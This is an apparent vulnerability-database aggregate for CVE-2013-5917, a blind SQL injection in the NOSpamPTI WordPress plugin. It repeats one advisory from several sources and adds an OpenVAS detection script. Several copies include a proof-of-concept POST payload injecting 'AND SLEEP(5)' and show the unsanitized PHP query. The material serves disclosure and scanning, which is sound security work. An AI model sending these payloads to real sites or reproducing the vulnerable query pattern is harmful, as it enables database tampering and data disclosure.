SQL injection vulnerability in wp-comments-post.php in the NOSpam PTI plugin 2.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the comment_post_ID parameter.
{"patchstack": [{"lastseen": "2022-06-01T19:50:43", "description": "NOSpamPTI plugin is prone to a blind SQL injection vulnerability because of the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. The issue allows to manipulate SQL queries in the back-end database. It results manipulation or disclosure of arbitrary data.\n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2013-09-23T00:00:00", "type": "patchstack", "title": "WordPress NOSpamPTI Plugin - Blind SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-23T00:00:00", "id": "PATCHSTACK:539F48BC895625966452BE14A09601C6", "href": "https://patchstack.com/database/vulnerability/nospampti/wordpress-nospampti-plugin-blind-sql-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-02T05:11:46", "description": "WordPress NOSpamPTI plugin version 2.1 suffers from a remote blind SQL injection vulnerability.", "cvss3": {}, "published": "2013-09-21T00:00:00", "type": "zdt", "title": "WordPress NOSpamPTI 2.1 Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-21T00:00:00", "id": "1337DAY-ID-21260", "href": "https://0day.today/exploit/description/21260", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n\r\n[ Vendor product description ]\r\n\r\nNOSpamPTI eliminates the spam in your comment box so 
strong and free,\r\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\r\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n\r\n[ Bug Description ]\r\n\r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n\r\n[ History ]\r\n\r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. According the vendor, the plugin was deprecated.\r\n\r\n[ Impact ]\r\n\r\nHIGH\r\n\r\n[ Afected Version ]\r\n\r\n2.1\r\n\r\n[ CVE Reference]\r\n\r\nCVE-2013-5917\r\n\r\n[ POC ]\r\n\r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n\r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\r\n\r\n[ Vulnerable code ]\r\n\r\n$post_id = $_POST['comment_post_ID'];\r\n\r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n\r\n if ($hash != $challenge) {\r\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}\");\r\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\r\n\r\n\r\n[ Reference ]\r\n\r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n\r\n--------------------------------------------\r\niBliss 
Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos\r\n\r\nalexos (at) ibliss.com (dot) br [email concealed]\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/21260", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-18T01:25:08", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2013-09-23T00:00:00", "type": "zdt", "title": "Wordpress NOSpamPTI Plugin - Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-23T00:00:00", "id": "1337DAY-ID-21269", "href": "https://0day.today/exploit/description/21269", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n \r\n[ Vendor product description ]\r\n \r\nNOSpamPTI eliminates the spam in your comment box so strong and free,\r\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\r\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n \r\n[ Bug Description ]\r\n \r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n \r\n[ History ]\r\n \r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. 
According the vendor, the plugin was deprecated.\r\n \r\n[ Impact ]\r\n \r\nHIGH\r\n \r\n[ Afected Version ]\r\n \r\n2.1\r\n \r\n[ CVE Reference]\r\n \r\nCVE-2013-5917\r\n \r\n[ POC ]\r\n \r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n \r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\r\n \r\n[ Vulnerable code ]\r\n \r\n$post_id = $_POST['comment_post_ID'];\r\n \r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n \r\n if ($hash != $challenge) {\r\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}\");\r\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\r\n \r\n \r\n[ Reference ]\r\n \r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n \r\n--------------------------------------------\r\niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos\n\n# 0day.today [2018-02-17] #", "sourceHref": "https://0day.today/exploit/21269", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:38:20", "description": "This host is installed with WordPress NOSpamPTI plugin and is prone to sql\ninjection vulnerability.", "cvss3": {}, "published": "2013-09-27T00:00:00", "type": "openvas", "title": "WordPress NOSpamPTI Plugin 'comment_post_ID' Parameter SQL Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2018-09-15T00:00:00", "id": "OPENVAS:1361412562310804021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804021", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_nospampti_blind_sql_inj_vuln.nasl 11401 2018-09-15 08:45:50Z cfischer $\n#\n# WordPress NOSpamPTI Plugin 'comment_post_ID' Parameter SQL Injection Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804021\");\n script_version(\"$Revision: 11401 $\");\n script_cve_id(\"CVE-2013-5917\");\n script_bugtraq_id(62580);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 10:45:50 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-27 18:32:16 +0530 (Fri, 27 Sep 2013)\");\n script_name(\"WordPress NOSpamPTI Plugin 'comment_post_ID' Parameter SQL Injection Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with WordPress NOSpamPTI plugin and is prone to sql\ninjection 
vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check whether it is able to execute sql\ncommand or not.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\nsince the disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\");\n script_tag(name:\"insight\", value:\"Input passed via the 'comment_post_ID' parameter to wp-comments-post.php\nscript is not properly sanitised before being used in the code.\");\n script_tag(name:\"affected\", value:\"WordPress NOSpamPTI Plugin version 2.1 and prior.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to inject or manipulate SQL\nqueries in the back-end database, allowing for the manipulation or\ndisclosure of arbitrary data.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Sep/101\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:http_port)){\n exit(0);\n}\n\nurl = dir + \"/wp-comments-post.php\";\n\nsleep = make_list(1 , 3);\n\nhost = http_host_name(port:http_port);\n\nforeach i (sleep)\n{\n comment = rand_str(length:8);\n\n postData = \"author=OpenVAS&email=test%40mail.com&url=1&comment=\" + comment 
+\n \"&submit=Post+Comment&comment_post_ID=1 AND SLEEP(\" + i + \")&comment_parent=0\";\n\n asReq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postData), \"\\r\\n\",\n \"\\r\\n\", postData);\n\n start = unixtime();\n asRes = http_keepalive_send_recv(port:http_port, data:asReq);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n else temp += 1;\n}\n\nif (temp == 2 )\n{\n security_message(port:http_port);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:09", "description": "", "cvss3": {}, "published": "2013-09-20T00:00:00", "type": "packetstorm", "title": "WordPress NOSpamPTI 2.1 Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-20T00:00:00", "id": "PACKETSTORM:123331", "href": "https://packetstormsecurity.com/files/123331/WordPress-NOSpamPTI-2.1-Blind-SQL-Injection.html", "sourceData": "`[ NOSpamPTI Wordpress plugin Blind SQL Injection ] \n \n[ Vendor product description ] \n \nNOSpamPTI eliminates the spam in your comment box so strong and free, \ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\" \nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support \nchanges to the functions.php to this we alter this function and \navailable as a plugin. Make good use of this plugin and forget all the Spam. \n \n[ Bug Description ] \n \nNOSpamPTI contains a flaw that may allow an attacker to carry out a \nBlind SQL injection attack. The issue is due to the wp-comments-post.php \nscript not properly sanitizing the comment_post_ID in POST data. This \nmay allow an attacker to inject or manipulate SQL queries in the \nback-end database, allowing for the manipulation or disclosure of \narbitrary data. 
\n \n[ History ] \n \nAdvisory sent to vendor on 09/09/2013 \nVendor reply 09/20/2013. According the vendor, the plugin was deprecated. \n \n[ Impact ] \n \nHIGH \n \n[ Afected Version ] \n \n2.1 \n \n[ CVE Reference] \n \nCVE-2013-5917 \n \n[ POC ] \n \nPayload: \nPOST /wordpress/wp-comments-post.php \n \nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1 \nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1 \n \n[ Vulnerable code ] \n \n$post_id = $_POST['comment_post_ID']; \n \nload_plugin_textdomain('nospampti', \nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/'); \n \nif ($hash != $challenge) { \n$wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID = \n{$comment_id}\"); \n$count = $wpdb->get_var(\"select count(*) from $wpdb->comments \nwhere comment_post_id = {$post_id} and comment_approved = '1'\"); \n \n \n[ Reference ] \n \n[1] No SpamPTI SVN repository - \nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php \n[2] Owasp - https://owasp.org/index.php/SQL_Injection \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ \n \n-------------------------------------------- \niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos \n \nalexos (at) ibliss.com (dot) br [email concealed] \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123331/wpnospampti-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:18:41", "bulletinFamily": "software", "cvelist": ["CVE-2013-5917"], "description": "The nospampti WordPress plugin was affected by a wp-comments-post.php comment_post_ID Parameter SQL Injection security vulnerability.\n", "modified": "2019-10-21T10:32:40", "published": "2014-08-01T10:59:03", "id": "WPVDB-ID:36A3A0FA-B911-4F00-AA93-C5C1B16D0887", "href": 
"https://wpscan.com/vulnerability/36a3a0fa-b911-4f00-aa93-c5c1b16d0887", "type": "wpvulndb", "title": "NOSpamPTI 2.1 - wp-comments-post.php comment_post_ID Parameter SQL Injection", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "cvelist": ["CVE-2013-5917"], "description": "\r\n\r\n[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n\r\n[ Vendor product description ]\r\n\r\nNOSpamPTI eliminates the spam in your comment box so strong and free,\r\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\r\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n\r\n[ Bug Description ]\r\n\r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n\r\n[ History ]\r\n\r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. 
According the vendor, the plugin was deprecated.\r\n\r\n[ Impact ]\r\n\r\nHIGH\r\n\r\n[ Afected Version ]\r\n\r\n2.1\r\n\r\n[ CVE Reference]\r\n\r\nCVE-2013-5917\r\n\r\n[ POC ]\r\n\r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n\r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\r\n\r\n[ Vulnerable code ]\r\n\r\n$post_id = $_POST['comment_post_ID'];\r\n\r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n\r\n if ($hash != $challenge) {\r\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}\");\r\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\r\n\r\n\r\n[ Reference ]\r\n\r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n\r\n--------------------------------------------\r\niBliss Seguranca e Inteligencia - Sponsor: Alexandro Silva - Alexos\r\n\r\nalexos (at) ibliss.com (dot) br [email concealed]\r\n\r\n", "edition": 1, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:DOC:29866", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29866", "title": "[iBliss Security Advisory] Blind SQL injection vulnerability in NOSpamPTI wordpress plugin", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:46:20", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2013-10-02T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, 
ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-5640", "CVE-2013-5916", "CVE-2013-4339", "CVE-2013-5639", "CVE-2013-5692", "CVE-2013-1443", "CVE-2013-4340", "CVE-2013-5696", "CVE-2013-2225", "CVE-2013-5917", "CVE-2013-4315", "CVE-2013-5739", "CVE-2013-2226", "CVE-2013-5738", "CVE-2013-4338", "CVE-2013-5693"], "modified": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13311", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13311", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:08", "description": "\nWordPress Plugin NOSpamPTI - Blind SQL Injection", "edition": 2, "cvss3": {}, "published": "2013-09-23T00:00:00", "title": "WordPress Plugin NOSpamPTI - Blind SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5917"], "modified": "2013-09-23T00:00:00", "id": "EXPLOITPACK:54A43696C6486D0F58617FC5378E5A1A", "href": "", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\n\n[ Vendor product description ]\n\nNOSpamPTI eliminates the spam in your comment box so strong and free,\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\nchanges to the functions.php to this we alter this function and\navailable as a plugin. 
Make good use of this plugin and forget all the Spam.\n\n[ Bug Description ]\n\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\nscript not properly sanitizing the comment_post_ID in POST data. This\nmay allow an attacker to inject or manipulate SQL queries in the\nback-end database, allowing for the manipulation or disclosure of\narbitrary data.\n\n[ History ]\n\nAdvisory sent to vendor on 09/09/2013\nVendor reply 09/20/2013. According the vendor, the plugin was deprecated.\n\n[ Impact ]\n\nHIGH\n\n[ Afected Version ]\n\n2.1\n\n[ CVE Reference]\n\nCVE-2013-5917\n\n[ POC ]\n\nPayload:\nPOST /wordpress/wp-comments-post.php\n\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\n\n[ Vulnerable code ]\n\n$post_id = $_POST['comment_post_ID'];\n\nload_plugin_textdomain('nospampti',\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\n\n if ($hash != $challenge) {\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\n{$comment_id}\");\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\n\n\n[ Reference ]\n\n[1] No SpamPTI SVN repository -\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\n\n--------------------------------------------\niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-01-13T06:16:22", "description": "", "cvss3": {}, "published": "2013-09-23T00:00:00", "type": "exploitdb", "title": "WordPress Plugin NOSpamPTI - Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5917", "2013-5917"], "modified": "2013-09-23T00:00:00", "id": "EDB-ID:28485", "href": "https://www.exploit-db.com/exploits/28485", "sourceData": "[ NOSpamPTI Wordpress plugin Blind SQL Injection ]\r\n\r\n[ Vendor product description ]\r\n\r\nNOSpamPTI eliminates the spam in your comment box so strong and free,\r\ndeveloped from the idea of Nando Vieira <a href=\"http://bit.ly/d38gB8\"\r\nrel=\"nofollow\">http://bit.ly/d38gB8</a>, but some themes do not support\r\nchanges to the functions.php to this we alter this function and\r\navailable as a plugin. Make good use of this plugin and forget all the Spam.\r\n\r\n[ Bug Description ]\r\n\r\nNOSpamPTI contains a flaw that may allow an attacker to carry out a\r\nBlind SQL injection attack. The issue is due to the wp-comments-post.php\r\nscript not properly sanitizing the comment_post_ID in POST data. This\r\nmay allow an attacker to inject or manipulate SQL queries in the\r\nback-end database, allowing for the manipulation or disclosure of\r\narbitrary data.\r\n\r\n[ History ]\r\n\r\nAdvisory sent to vendor on 09/09/2013\r\nVendor reply 09/20/2013. 
According the vendor, the plugin was deprecated.\r\n\r\n[ Impact ]\r\n\r\nHIGH\r\n\r\n[ Afected Version ]\r\n\r\n2.1\r\n\r\n[ CVE Reference]\r\n\r\nCVE-2013-5917\r\n\r\n[ POC ]\r\n\r\nPayload:\r\nPOST /wordpress/wp-comments-post.php\r\n\r\nauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1\r\nAND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1\r\n\r\n[ Vulnerable code ]\r\n\r\n$post_id = $_POST['comment_post_ID'];\r\n\r\nload_plugin_textdomain('nospampti',\r\nWP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');\r\n\r\n if ($hash != $challenge) {\r\n $wpdb->query(\"DELETE FROM {$wpdb->comments} WHERE comment_ID =\r\n{$comment_id}\");\r\n $count = $wpdb->get_var(\"select count(*) from $wpdb->comments\r\nwhere comment_post_id = {$post_id} and comment_approved = '1'\");\r\n\r\n\r\n[ Reference ]\r\n\r\n[1] No SpamPTI SVN repository -\r\nhttp://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php\r\n[2] Owasp - https://owasp.org/index.php/SQL_Injection\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/\r\n\r\n--------------------------------------------\r\niBliss Seguran\u00e7a e Intelig\u00eancia - Sponsor: Alexandro Silva - Alexos", "sourceHref": "https://www.exploit-db.com/download/28485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}